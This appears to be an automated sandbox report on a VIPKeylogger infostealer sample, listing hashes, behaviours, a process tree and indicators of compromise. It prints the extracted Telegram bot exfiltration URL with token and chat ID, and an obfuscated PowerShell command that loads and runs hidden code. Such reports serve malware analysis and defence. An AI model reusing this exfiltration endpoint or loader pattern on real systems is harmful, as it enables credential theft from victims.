Analysis
max time kernel: 141s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-12-2024 03:05
Static task: static1
Behavioral task: behavioral1
  Sample: d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
  Resource: win10v2004-20241007-en
General
Target: d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
Size: 560KB
MD5: 376eba8de3fb318ec11efa037f8c0999
SHA1: 998079a01ea4b5af7d90b44e289ff3e61caaa6c2
SHA256: d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b
SHA512: 1113f67e131f0dc952f8168be4274f910e942992b6775daaa241f48e1852ceb10875d609d34fed41ac2b5ba845d34adf327a99eaa52a7be3dbf054876aae7496
SSDEEP: 6144:14t6Ls60mub8lmN1d/VJjbGTaQ8jY7dsO9sKL/urW09nSl6Mkmt4XzVkpmAZ51Mg:1kuicyCdsYsKLktnS5oVMmySMpQK7
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7689901861:AAEBNHwgb6W6VOFJWVPXuo-RFbpacsgCwQg/sendMessage?chat_id=7582232587
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
Vipkeylogger family
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Blocklisted process makes network request 8 IoCs
flow | pid | Process
24 | 2808 | msiexec.exe
26 | 2808 | msiexec.exe
28 | 2808 | msiexec.exe
30 | 2808 | msiexec.exe
32 | 2808 | msiexec.exe
47 | 2808 | msiexec.exe
49 | 2808 | msiexec.exe
53 | 2808 | msiexec.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
23 | drive.google.com
24 | drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
46 | checkip.dyndns.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid | Process
2808 | msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid | Process
432 | powershell.exe
2808 | msiexec.exe
Command and Scripting Interpreter: PowerShell
pid | Process
432 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid | Process
432 | powershell.exe (9 entries)
2808 | msiexec.exe (2 entries)
Suspicious behavior: MapViewOfSection 1 IoCs
pid | Process
432 | powershell.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
description | pid | Process
Token: SeDebugPrivilege | 432 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 432 | powershell.exe
Token: SeSecurityPrivilege | 432 | powershell.exe
Token: SeTakeOwnershipPrivilege | 432 | powershell.exe
Token: SeLoadDriverPrivilege | 432 | powershell.exe
Token: SeSystemProfilePrivilege | 432 | powershell.exe
Token: SeSystemtimePrivilege | 432 | powershell.exe
Token: SeProfSingleProcessPrivilege | 432 | powershell.exe
Token: SeIncBasePriorityPrivilege | 432 | powershell.exe
Token: SeCreatePagefilePrivilege | 432 | powershell.exe
Token: SeBackupPrivilege | 432 | powershell.exe
Token: SeRestorePrivilege | 432 | powershell.exe
Token: SeShutdownPrivilege | 432 | powershell.exe
Token: SeDebugPrivilege | 432 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 432 | powershell.exe
Token: SeRemoteShutdownPrivilege | 432 | powershell.exe
Token: SeUndockPrivilege | 432 | powershell.exe
Token: SeManageVolumePrivilege | 432 | powershell.exe
Token: 33 | 432 | powershell.exe
Token: 34 | 432 | powershell.exe
Token: 35 | 432 | powershell.exe
Token: 36 | 432 | powershell.exe
Token: SeDebugPrivilege | 2808 | msiexec.exe
Suspicious use of WriteProcessMemory 7 IoCs
description | pid | Process | procid_target
PID 3312 wrote to memory of 432 | 3312 | d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe | 82
PID 3312 wrote to memory of 432 | 3312 | d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe | 82
PID 3312 wrote to memory of 432 | 3312 | d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe | 82
PID 432 wrote to memory of 2808 | 432 | powershell.exe | 91
PID 432 wrote to memory of 2808 | 432 | powershell.exe | 91
PID 432 wrote to memory of 2808 | 432 | powershell.exe | 91
PID 432 wrote to memory of 2808 | 432 | powershell.exe | 91
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Processes
1. C:\Users\Admin\AppData\Local\Temp\d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe"
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory
   PID: 3312
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle minimized "$Underborer=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Prvelser.Lac';$succederer=$Underborer.SubString(68121,3);.$succederer($Underborer)"
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 432
      3. C:\Windows\SysWOW64\msiexec.exe
         Command line: "C:\Windows\SysWOW64\msiexec.exe"
         - Accesses Microsoft Outlook profiles
         - Blocklisted process makes network request
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - System Location Discovery: System Language Discovery
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - outlook_office_path
         - outlook_win_path
         PID: 2808
Network
MITRE ATT&CK Enterprise v15
Downloads
1. Filesize: 66KB
   MD5: 2fdb2387b2ec76ba38cf0b98ff9b385a
   SHA1: 159f150b31e4282ad50fee6b9cf2198bc7e6434b
   SHA256: fbf49a93c4f39e1b67a8b995df62cdb2ab62bc8508246442613c6dd57ccb070f
   SHA512: f5461b96e7c6b647c371c91fc7049f62565239c57105c91833faf6e23073f06206ffa4a0d79e584ed8e080d0f985126863c354f42c4f82c4d7b756ffca583c76
2. Filesize: 313KB
   MD5: 2aedacd2d5f1723295bd050493254f2e
   SHA1: 08922a972106ebc10443b2353004317f67a408cb
   SHA256: 8c95496e75cc10a476add694057c11ec66b5cebe03cf7a67e996e014487566d4
   SHA512: cb3c4a856d3b10dcfdc6437b2f67811da95e7668ad6c59598ef838b439ebfa35ecb3f9599eb46f99124b2700a54a4d66503ffad3517f168ecca7eecd6ad40a5f
3. Filesize: 60B
   MD5: d17fe0a3f47be24a6453e9ef58c94641
   SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
   SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
   SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82